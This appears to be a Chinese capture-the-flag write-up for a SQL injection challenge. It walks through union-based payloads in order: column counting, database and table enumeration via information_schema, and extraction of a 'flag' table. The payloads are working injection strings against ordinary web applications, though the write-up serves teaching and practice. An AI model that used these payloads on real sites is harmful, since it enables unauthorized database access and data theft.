首先打开题目,题目让我们输入1试一试
![](https://img-blog.csdnimg.cn/img_convert/9cc4d0695f45f5b316b00c7220bc363b.png)
发现有回显,我们尝试分析一下它所给我们的语句。
select * from news where id=1
我们可以看到我们所输入的数据是跟在了ID的后面,并且是在url上进行了显示,我们可以知道这是一个gey上传的语句,我们打开hack bar,更改成ID=2试一试
![](https://img-blog.csdnimg.cn/img_convert/b6f89dda391c13291bd20a065abf95e7.png)
我们的猜想是正确的,我们尝试使用标识符来进行sql命令的注入。
1' order by 2 #
![](https://img-blog.csdnimg.cn/img_convert/2033fc4e5571827ebf43972d953c8b5e.png)
查询数据库
-1' union select 1,database() #
![](https://img-blog.csdnimg.cn/img_convert/0a0a51e6a068a2cbbcb5a39bc40a2982.png)
查询表
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
![](https://img-blog.csdnimg.cn/img_convert/9780f44b44bc9039886683de327eff40.png)
查询列
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
![](https://img-blog.csdnimg.cn/img_convert/42950604a1a4d7b579173f36afe4b56b.png)
查内容
-1' union select 1,flag from flag #
![](https://img-blog.csdnimg.cn/img_convert/f2484d00575c1600fd229a9a02d12116.png)